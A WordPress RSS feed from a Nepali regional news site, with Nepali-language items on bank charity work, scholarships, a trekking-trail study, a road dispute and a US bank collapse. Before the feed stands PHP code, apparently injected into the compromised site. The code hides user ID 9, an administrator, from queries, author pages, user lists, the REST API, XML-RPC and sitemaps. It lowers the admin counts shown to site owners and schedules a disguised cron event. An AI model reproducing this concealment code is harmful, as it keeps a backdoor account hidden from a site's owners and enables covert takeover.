add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
बैंक – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceSun, 05 May 2024 01:00:07 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgबैंक – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232कश्यप गोत्रीय अधिकारीको जिल्ला भेला एवम् वनभोज जेठ १२ गते
https://www.antaranganews.com/?p=24134
https://www.antaranganews.com/?p=24134#respondSat, 04 May 2024 11:44:04 +0000https://www.antaranganews.com/?p=24134भोटेओडार(लमजुङ)– कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठान नेपाल जिल्ला शाखा लमजुङ– रुपाकोटको जिल्ला भेला आउदो जेठ १२ गतेका दिन रुपाकोटमा हुने भएको छ । सो प्रतिष्ठानको जिल्ला शाखाको बैशाख २२ गते यहाँ सम्पन्न बैठकले सो निर्णय गरेको हो ।
बैठकले जिल्ला भेला तथा वनभोज कार्यक्रममा विगत वर्षझैं ८४ वर्ष पुग्नु भएका जेष्ठनागरिकलाई सम्मान, पिएचडि उपाधि हासिल गर्नेलाई सम्मान, एसईई परीक्षामा सर्वोत्कृष्ठ अंक ल्याउने १÷१ जना सो छात्र÷छात्रालाई सम्मान गर्ने कार्यलाई निरन्तरता दिइने भएको छ । त्यस बाहेक प्रतिष्ठानको अक्षयकोषका लागि १० हजार रुपैयाँ वा सो भन्दा बढी दान गर्नेहरूलाई दान रकम अनुसारको सम्मान गर्ने कार्यक्रम समेत रहेको प्रतिष्ठानका जिल्ला सचिव गोविन्दप्रसाद अधिकारीले बताउनु भयो । उहाँका अनुसार गत वर्षदेखि थालिएको छात्रवृत्ती कार्यक्रमलाई यो वर्ष पनि निरन्तरता दिइने भएको छ । उहाँले भन्नुभयो, ‘सो अवसरमा छात्रवृत्तीका दातालाई समेत सम्मान गर्ने रहेको छ ।’
उक्त जिल्ला भेलाको मुख्य आकर्षण अक्षयकोष विस्तारलाई लिइएको अध्यक्ष तुलसीविकास अधिकारीले बताउनु भयो ।
यो वर्षको सातौं वार्षिक वनभोज तथा जिल्ला भेला कार्यक्रम हो । यसअघि वनभोज कार्यक्रम पहिलो वर्ष रुपाकोटबाट नै सो कार्यक्रम थालिएको थियो । दोस्रो वर्ष उदीपुर, तेस्रो वर्ष खहरे, चौथो वर्ष भोटोओडार, पाँचौं वर्ष भारते र छौटौं वर्ष दुराडाँडामा सञ्चालन गरिएको थियो । यो वर्ष रुपाकोटामा दोहोरिएको प्रतिष्ठानको सहसचिव पार्वतादेवीले बताउनु भयो ।
प्रतिष्ठानको जिल्ला शाखाका अध्यक्ष तुलसीविकास अधिकारीको अध्यक्षतामा भएको बैठकमा प्रतिष्ठानका केन्द्रीय सदस्य नवराज पहाडी, वरिष्ठ उपाध्यक्ष खेमलाल अघिकारी, उपाध्यक्ष सिर्जना अधिकारी, सहसचिव पार्वतीदेवी अधिकारी, कोषाध्यक्ष गोपालकृष्ण अधिकारीको उपस्थिति रहेको प्रतिष्ठाका जिल्ला सचिव गोविन्दप्रसादले बताउनु भयो । उहाँका अनुुसार कार्यकारी सदस्यहरू कमल, नमिता, हरिराम, प्रमोद आदिको सहभागी हुनुहुन्थ्यो । उहाँले भन्नुभयो, ‘बैठकमा केन्द्रीय प्रतिनिधि प्रकाशचन्द्र अधिकारी, केन्द्रीय प्रतिनिधि परिषद सदस्य मुक्तिनाथ अधिकारी, सल्लाहकार सदस्य स्याम अधिकारी, शिवराज अधिकारी मध्यनेपाल नगर सचिव, चिनु अधिकारी नगर सदस्य मध्यनेपाल लगायत उपस्थित हुनुहुन्थ्यो ।’
फोटो सौजन्य : प्रमोद अधिकारी ।
]]>
https://www.antaranganews.com/?feed=rss2&p=241340सिटिजन बैंकद्वारा प्रहरीलाई ड्रग टेष्ट किट हस्तान्तरण
https://www.antaranganews.com/?p=21252
https://www.antaranganews.com/?p=21252#respondFri, 15 Dec 2023 16:04:48 +0000https://www.antaranganews.com/?p=21252भोटेओडार(लमजुङ) । सिटिजन्स् बैंक लि. शाखा कार्यालय भोटेओडारद्वारा नेपाल प्रहरीलाई मल्टि ड्ग टेस्ट किट सहयोग गरेको छ । संस्थागत सामाजिक उत्तरदायित्व कार्यक्रम अन्तर्गत बैंकले सो सहयोग मंरिर २८ गते गरेको हो ।
यस्तो सहयोग नेपाल प्रहरीले जिल्लामै पहिलो पटक पाएको बताइएको छ । बैंकको सो शाखा कार्यलयको बार्षिक संस्थागत सामाजिक उत्तरदायित्व कार्यक्रम अन्तर्गत ईलाका प्रहरी कार्यालय भोटेओडारका प्रमुखलाई सोही कार्यालयका आयोजित एक अनौपचारिक कार्यक्रम बीच शाखा प्रबन्धक अनुप अधिकारीले ईलाका प्रहरी कार्यालयका प्रमुख प्रहरी निरीक्षक साकारराज पन्तलाई २५ थान ती कटि हस्तान्तरण गर्नु भएको हो ।
प्रबन्धक अनुप अधिकारीले समाजमा बढ्दै गइरहेको लागुऔषध दुव्र्यसन तथा त्यसबाट उत्पन्न हुने विभिन्न प्रकारका अपराध रोकथाम तथा नियन्त्रण गर्ने क्रममा लागऔषध प्रयोकर्ता पहिचानको लागि सहज होस्् भन्ने उद्देश्यले प्रहरीको दैनिक उपयोगका लागि आबश्यक २५ थान किट सहयोग गरिएको बताउनु भयो । उहाँका अनुसार मल्टि ड्ग टेस्ट किट शाखाबाट सामाजिक उत्तरदायित्व सियसआर अन्तर्गतको बजेटबाट हस्तान्तरण गरिएको हो ।
ईलाका प्रहरी कार्यालय भोटेओडारका प्रमुख प्रहरी निरीक्षक साकारराज पन्तले किट बुझ्दै बैंक र बैंकको शाखा परिवारलाई धन्यवाद दिनु भयो । उहाँले आगामी दिनहरुमा अपराध नियन्त्रण तथा रोकथामको लागि शाखासंग आपसी सहयोग, समन्वय र सहकार्यको अपेक्षा गरिएको बताउनु भयो । उहाँले यस किटको मार्फतबाट लागुऔषध नियन्त्रणमा ठूलो सहयोग पुग्ने अपेक्षा राखिएको समेत जानकरी दिनु भयो । बिशेष गरी लामो दुरिका साबरी साधनका शंकास्पद चालकलाई सूचनाको आधारमा किटको माध्यमबाट त्यस्तो परीक्षण गरिने प्रहरि निरीक्षक पन्तले उल्लेख गर्नुभयो ।
शंकास्पद व्यक्तिको पिसाबबाट परीक्षण गरिने यी किटबाट ६ किसिमका लागू औषधहरु गाँजा, ब्राउन सुगर, मर्फिन, कोकेन, बार्बेटेरस लगायतका लागुऔषध सेवन गरेको पहिचान गर्न सकिन्छ । भोटेओडार प्रहरीले मात्र नभई लमजुङ जिल्लामै पहिलोपटक यस्ता किटका मार्फतबाट लागुऔषध परीक्षण सुरु गर्ने भएको छ । किट हस्तान्तरणका अवसरमा शाखाको तर्फबाट प्रबन्धक अनुप अधिकारी बाहेक अपरेसन ईन्चार्ज किशोर आचार्य तथा ईलाका प्रहरी कार्यालयका प्रहरी निरीक्षक साकारराज पन्त तथा प्रहरी सहायक निरीक्षक केदार रिजाल लगायत सरोकारवालाहरूको सहभागिता थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=212520सानिमा विकास बैंकद्वारा लमजुङका २ जना गरिव तथा जेहेन्दार विद्यार्थीलाई छात्रवृत्ति प्रदान
https://www.antaranganews.com/?p=19186
https://www.antaranganews.com/?p=19186#respondThu, 05 Oct 2023 09:17:57 +0000https://www.antaranganews.com/?p=19186लमजुङ– सानिमा बैंक लि.को बेसीशहर शाखाले जिल्लाका २ जना गरिव तथा जेहेन्दार विद्यार्थीलाई उच्च माध्यमिक शिक्षाका लागि छात्रबृति प्रदान गरेको छ । बैंकले ती विद्यार्थीलाई शैक्षिक संस्थामा लाग्ने शुल्क तथा शैक्षिक सामग्रीहरूका अतिरिक्त मासिक दुई हजार रुपैया प्रदान गर्ने गर्दछ ।
सानिमा बैंकको बेसीशहर शाखाले सुन्दरबजार नगरपालिका– ६ का रुस्बिना वि.क, र मर्स्याङ्दी गाउँपालिका– ३ का राजन गुरुङलाई छात्रबृति प्रदान गरेको सोे बैंकको बेसीशहर शाखाका प्रवन्धक नवीनबिक्रम रायमाझीले बताउनु भयो । उहाँका अनुसार विगत ७ बर्षदेखि काठमाडौं उपत्यका बाहिर सञ्चालिन प्रत्येक शाखाहरूबाट कक्षा– ११ र १२ का लागि २– २ जना विद्यार्थीहरूलाई उच्च शिक्षा हासिल गर्न छात्रवृत्ति प्रदान गर्दै आइरहेको छ । यस वर्ष बेसीशहर शाखाले संस्थागत सामाजिक उत्तरदायित्व (Corporate Social Responsibility) अन्तर्गत शाखाबाट दुई जना गरिब तथा जेहेन्दार विद्यार्थीहरूलाई उच्च माध्यमिक शिक्षाको छात्रवृत्ति प्रदान गर्ने कार्यक्रम तय गरे अनुसार सो रकम वितरण गरिने भएको हो ।
प्रवन्धक रायमाझीले भन्नुभयो, ‘बैंकले काठमाडौं उपत्यका बाहिरका हरेक शाखाहरूबाट दुई जनालाई छात्रवृत्ति दिदैं आएकोलाई यो वर्ष पनि निरन्तरता दिएको हो । यस बैंकले उच्च माध्यमिक तह (प्लस टु) अध्ययनका लागि सानिमा बैंकको शाखा रहेका स्थानीय निकायका स्थायी बासिन्दाहरू मध्येबाट २०७९ सालमा सञ्चालित एस.ई.ई. परीक्षामा न्यूनतम ‘बी’ ग्रेड अर्थात २.४० जि.पि.ए प्राप्त गरी उत्तीर्ण गर्ने गरीब तथा विपन्न परिवारका विद्यार्थीहरूलाई आवेदन दिन सूचना प्रकाशित गरी विद्यार्थीको छनौट गर्ने गरेको उहाँको भनाइ छ ।
सोही निवेदनका आधारमा प्राप्त आवेदक विद्यार्थीहरू मध्येबाट सबैभन्दा विपन्न तथा जेहेन्दार विद्यार्थी छनौट प्रक्रिया अन्तर्गत पर्न आएका १५ निवेदकहरू मध्ये अन्तिम छनोटमा परेका ८ जना विद्यार्थीहरूको शैक्षिक छात्रवृत्ति छनौटका लागि लमजुङ जिल्ला स्थित विभिन्न निकायका व्यक्तिहरू सम्मिलित छनौट समितिद्वारा विक र गुरुङलाई छनौट गरेको हुँदा उहाँहरूलाई नै छात्रवृत्ती प्रदान गरिएको रायामाझीले जानकारी दिनुभयो । उहाँका अनुसार यस वर्ष बेसीशहर शाखाले संस्थागत सामाजिक उत्तरदायित्व (Corporate Social Responsibility) अन्तर्गत शाखाबाट दुई जना गरिब तथा जेहेन्दार विद्यार्थीहरूलाई उच्च माध्यमिक शिक्षाको छात्रवृत्ति प्रदान गर्ने कार्यक्रम राखेको थियो । उहाँले भन्नुभयो, ‘छनौट भएका दुई विद्यार्थी(विक र गुरुङ)लाई उहाँहरूले आफ्नो विद्यालयबाट भर्ना, भएको फि तिरेको रसिद तथा शैक्षिक सामग्री खरिदको बिल ल्याएपछि उहाँहरूको बैंक खातामा रकम पोष्ट गर्ने बैंकको नीति रहेको छ ।’
]]>https://www.antaranganews.com/?feed=rss2&p=191860ग्रामीण पर्यटन प्रवर्द्धनका लागि पदमार्ग बनाउन १५ दिने अध्ययन भ्रमण सुरु
https://www.antaranganews.com/?p=16072
https://www.antaranganews.com/?p=16072#respondSun, 18 Jun 2023 01:51:14 +0000https://www.antaranganews.com/?p=16072लमजुङ– ग्रामीण पर्यटन प्रवर्द्धनका लागि पदमार्ग बनाउन १५ दिने अध्ययन भ्रमण सुरु भएको छ । त्यस टिमको नेतृत्व TAAN का द्वितीय उपाध्यक्ष धनबहादुर गुरुङले गर्नु भएको छ । गोर्खाको अजिरकोटबाट १५ सदस्यीय टोलीले सो अध्ययनमा असार २ गते निस्केको हो ।
सो पदमार्गलाई बुद्ध हिमाल–हिमचुली ग्रेट लेक सर्किट ट्रेल (Buddha Himal Himchuli Great Lake Circut Trail) नामाकरण गरिने भएको छ । त्यसको निर्माणका लागि ट्रेकिङ एजेन्सी एसोसिएसन अफ नेपाल (टान)ले प्राविधिक सहयोग गर्ने भएको छ । सोही उद्देश्य प्राप्तिका लागि गोरखाको अजिरकोट गाउँपालिका– बारपाक सुलिकोट गाउँपालिका– लमजुङको दुधपोखरी गाउँपालिका– दोर्दी गाउँपालिका हुँदै मर्स्याङ्दी गाउँपालिकाको संयुक्त टोलीले अध्ययन थालेको हो ।
Treeking Agenccies Association of Nepal -TAAN को प्रवर्द्धन एवम् प्राविधिक सहयोगमा अन्वेषण योजना तथा डि.पि.आर निर्माण एवं प्रवर्द्धन भ्रमणमा सो प्राविधिक टिमले उक्त स्थानको खोज, अनुसन्धान एवं वास्तविक अबस्थाको बारेमा जानकारी लिने भएको दोर्दी गाउँपालिकाका अध्यक्ष युवराज अघिकारीले बताउनु भयो । उहाँका अनुसार हालका लागि गोरखाका दुई पालिका अजिरकोट गाउँपालिका र बारपाक सुलिकोट गाउँपालिका तथा लमजुङका दुधपोखरी गाउँपालिका, दोर्दी गाउँपालिका र मर्स्याङ्दी गाउँपालिकासम्म पदमार्गको निर्माण गरिने भएको छ । उहाँले भन्नुभयो, ‘यसको उपलब्धी र आवश्यकताको आधारमा अन्य पालिका समेत यसमा समावेस गरी पदमार्गको अवधि विस्तार गर्ने लक्ष्य रहेको छ ।’
भ्रमण टिमको नेतृत्व गर्नु भएका TAAN का द्वितीय उपाध्यक्ष धनबहादुर गुरुङले १५ जना सहभागी रहेको अध्यउन टोलीले १५ दिन सम्म घुमेर उक्त स्थानको बस्तुस्थितिको बारेमा जानकारी लिने बताउनु भयो । उहाँका अनुसार त्यस लगत्तै आवश्यक पूर्वाधारहरू निर्माण कार्यको थालनी गरिने छ ।
यसअघि पोखराको TAAN को टिम सहित राइनास– दुधपोखरी हुँदै लिपे– दाम्राङ– सेरासम्मको ४ दिनको यात्रा तय भइसकेको उहाँले जानकारी दिनु भयो । पर्यटकलाई जति धेरै समय आफ्नो स्थानीय ठाउँहरूमा घुमाउन सकियो त्यति नै स्थानीयको आम्दानी वृद्धि हुने हो । जसमा प्रत्येक पालिकालाई समेट्दा उक्त पालिकामा समेत आम्दानीको स्रोत वृद्धि हुने भएकाले अहिले लमजुङको ३ गाउँपालिका र गोरखाको २ गाउँपालिकालाई समेटेर उक्त पदमार्ग ट्रेक निर्माणको लागि तत्पर भएका छन् ।
प्रस्तावित पदमार्ग(ट्रेक) अन्य ट्रेक भन्दा पृथक रहनेछ सो पदमार्ग निर्माण समन्वय समितिका अध्यक्ष युवराज अधिकारीले बताउनु भयो । उहाँका अनुसार अन्य पदमार्गमा यात्रा गर्दा खोला या खोच खोच हुँदै माथी डाँंडामा पुगेपछि मात्रा view हेर्न पाइन्छ भने यो पदमार्गको अधिकांश क्षेत्र टप(Top) मा हुने हुँदा यसमा यात्रा अवधी भर ट्रेक रमणीय हुनेछ । दोर्दीको भेगमा खान, बस्नका लागि त्यहाँ तत्कालको लागि होटेल, रेस्टुरेन्ट नभएता पनि त्यस ठाउँमा रहेका भेडी गोठ, गाई गोठ, भैंसी गोठलाई व्यवस्थित गरी यात्रालाई सहज बनाउन सकिनेतर्फ गाउँपालिकाको ध्यान गएको छ र त्यहाँ रहेका गोठहरूको स्तरोन्नति गर्ने नीतिगत निर्णय दोर्दी गाउँपालिकाले गरिसकेको छ । उक्त गोठहरूलाई सोलारको व्यवस्था, kitchen रुमको व्यवस्था साथै Store को राम्रो व्यवस्थापन गर्न सकियो भने ठूला होटेल रेस्टुरेन्टको आवश्यकता पर्ने छैन ।
निर्माण हुन लागेको पर्यटकीय पदमार्ग(ट्रेक) माछाको काँडा जस्तो आकारको बन्ने भ्रमण दलका नेतृत्वकर्ता एवम् TAAN का द्वितीय उपाध्यक्ष धनबहादुर गुरुङले बताउनु भयो । उहाँका अनुसार सो पदमार्गमा स्थानीय भूगोललाई पनि समेटिने छ । साथै पर्यटकले यात्रालाई आफ्नो आवश्यकताको अनुसार लम्ब्याउन तथा छोट्याउन सक्नेछन् । सबै पालिकाबाट त्यसको सहज पहुँच हुने गरी निर्माण हुनेछ उहाँको भनाइ छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=160720मध्यपहाडी लोकमार्गको सुन्दरबजार क्षेत्रमा रहेको लामो विवाद समाधान
https://www.antaranganews.com/?p=15013
https://www.antaranganews.com/?p=15013#respondSun, 21 May 2023 01:49:26 +0000https://www.antaranganews.com/?p=15013सुन्दरबजार(लमजुङ)– मध्यपहाडी लोकमार्गको लमजुङ जिल्लाको सुन्दरबजार क्षेत्रमा रहेको विवाद समाधान भएको छ । सो सडक स्विकृत भएदेखिनै सुन्दरबजारको बजार क्षेत्रका बासिन्दाले बजार क्षेत्रमा मापदण्डमा पुनर्विचार गर्न माग गर्दै आएकोमा त्यसलाई भौतिक पूर्वाधार तथा यातायात मन्त्रालयबाट सम्बोधन गरी समाधान भएको छ ।
सो सडकको डिपिआर अनुसार मापदण्ड कायम गरी सडक निर्माण गर्दा हालको बजार स्वरुप ध्वस्त हुने, कतिपय बजारबासीको उठीबास समेत हुने स्थिति रहेको हुँदा मापदण्डमा पुनर्विचार गर्नु पर्ने माग र अडान राख्दै विरोध गर्दै आएको स्थिति थियो । सोही विरोधका कारण उक्त सडकको जिल्लाको पूर्वी खण्ड(पाउँदी– धमिलिकुवा– गरमबेसी खण्ड)मा कालोपत्रे भइसक्दा तथा पश्चिमतर्फको (ग्लाग्दीखोला किरिञ्चे– बिमिरेभञ्ज्याङ) खण्डको पनि निर्माण कार्य अन्तिम चरणमा पुगेको छ । तर सुन्दरबजारको लमजुङ क्याम्पस गेटदेखि खत्रीढाँटी – ग्याग्दी खोला खण्डमा सडक निर्माणको काम समेत अवरुद्ध भएको थियो । सोही स्थितिलाई ध्यानमा राख्दै भौतिक पूर्वाधार तथा यातायात मन्त्री प्रकाश ज्वालाको निर्देशन बमोजिम सम्बन्धित आयोजनाले पत्राचार गरेको हो । जस अनुसार सो सडकको उक्त खण्डमा सडकको चौडाई १२ मिटर कायम भएको र (सडकको केन्द्रवाट ६, ६ मिटर) भन्दा बढी दुवै दायाँ वायाँको जग्गा रोक्का समेत नहुने गरी निर्णय भएको र कार्यान्वयनका लागि जेठ ४ गते सुन्दरबजार नगरपालिकालाई जानकारी समेत दिइसकेको हुँदा उक्त समस्या एवम् विवाद समाधान भएको हो । विषेश धन्यवाद तथा आभार :
नेकपा (एकीकृत) समाजवादी जिल्ला कमिटी लमजुङले माननीय मन्त्री प्रकाश ज्वाला (भौतिक पूर्वाधार तथा यातायात मन्त्रालय)लाई विशेष धन्यवाद तथा आभार व्यक्त गरेको छ । वर्षाैंदेखि सुन्दरवजार क्षेत्रमा रहेको पुष्पलाल मध्यपहाडी राजमार्गको सडकको चौडाई तथा जग्गा रोक्काको विषयमा समाधानको बाटो खोजी दिन सरोकारवालाहरूले पार्टीलाई गरेको अनुरोधलाई तदारुकताका साथ कार्यान्वयन गरी सो सडकको चौडाई उक्त खण्डमा १२ मिटर कायम भएको र १२ मिटर (केन्द्रवाट ६, ६ मिटर) भन्दा बढी दुवै दायाँ वायाँको जग्गा रोक्का समेत नहुने निर्णय गरी कार्यान्वयनको निर्देशन भएको छ ।
यही जेठ ४ गते सो सम्बन्धमा कार्यान्वयनका लागि नगरपालिकामा पत्राचार समेत भएकोमा पार्टीकोतर्फबाट मन्त्री ज्वालालाई धन्यवाद ज्ञापन गरिएको सो दलका जिल्ला संयोजक रामबाबु अधिकारीले बताउनु भएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=150130अमेरिकामा दुई महिना नबित्दै तेस्रो बैंक टाटपल्टियो
https://www.antaranganews.com/?p=14447
https://www.antaranganews.com/?p=14447#respondTue, 02 May 2023 02:17:47 +0000https://www.antaranganews.com/?p=14447काठमाडौं– अमेरिकामा दुई महिना नबित्दै तेस्रो बैंक टाटपल्टिएको छ । अमेरिकी बैंकिङ नियामकले सान फ्रान्सिस्कोस्थित बैंक फर्स्ट रिपब्लिकलाई बन्द गर्ने र ऋणदाताको निक्षेप जेपी मोर्गन चेसलाई बेच्ने घोषणा बैशाख १८ गते गरेसँग त्यस्तो खुलासा भएको हो ।
दुई महिना नपुग्दै अमेरिकामा तेस्रो बैंक टाट पल्टिन गएको हो । यसअघि अमेरिकामा गत मार्च १० मा सिलिकन भ्याली बैंक र सिग्नेचर बैंकको टाट पल्टिएका थिए । सम्पत्तिको आधारमा सिग्नेचर बैंक अमेरिकी इतिहासमा पतन हुने तेस्रो ठूलो बैंक थियो ।
फर्स्ट रिपब्लिक बैंकको पतन भए पनि जेपी मोर्गनले किनेसँगै आज १९ गतेदेखि नै दुई लाख ५० हजार अमेरिकी डलरभन्दा बढी बिमा क्याप भएकासहित सबै निक्षेपकर्ताहरूले आफ्नो पैसा प्राप्त गर्न सक्नेछन् ।
फर्स्ट रिपब्लिक बैंकको ९३.५ अर्ब अमेरिकी डलर जेपी मोर्गनले किन्ने छ । फर्स्ट रिपब्लिक बैंकका लागि अमेरिकाको फेडरल डिपोजिट इन्स्योरेन्स कर्पोरेसन (एफडीआईसी) जेपी मोर्गनसँग घाटा–साझेदारी सम्झौतामा पुग्न सक्षम भएको छ ।
धनी ग्राहकहरूलाई लोभ्याउन र आफैँसँग राख्नका लागि तुलनात्मक रूपमा कम ब्याजदरमा बैंकले दिएको ‘जम्बो मोर्टगेज ऋण’को मूल्यमा नाटकीय गिरावट आएसँग संकट सुरु भएको विज्ञहरूले औंल्याएका छन् ।
नियामकले तुरुन्तै चालेको कमदले अमेरिकी बैंकिङ क्षेत्रको पतनलाई थप संकटपूर्ण हुन दिएको छैन । तर, यो सम्झौताबाट आफ्नो बिमा कोषले करिब १३ अर्ब अमेरिकी डलरको घाटा बेहोर्ने एफडीआईसीले जनाएको छ ।
अमेरिकाबाहिर स्विट्जरल्यान्डको दोस्रो ठूलो इन्भेस्टमेन्ट बैंक क्रेडिट सुइसको पनि गत मार्चमा पतन भएको थियो । यो बैंकलाई स्विट्जरल्यान्डर्क अर्काे इन्भेस्टमेन्ट बैंक यूबीएसले किनेको थियो ।
यस घट्नाले विश्व अर्थ बजारमा शुभ संकेत दिएको छैन ।
]]>https://www.antaranganews.com/?feed=rss2&p=144470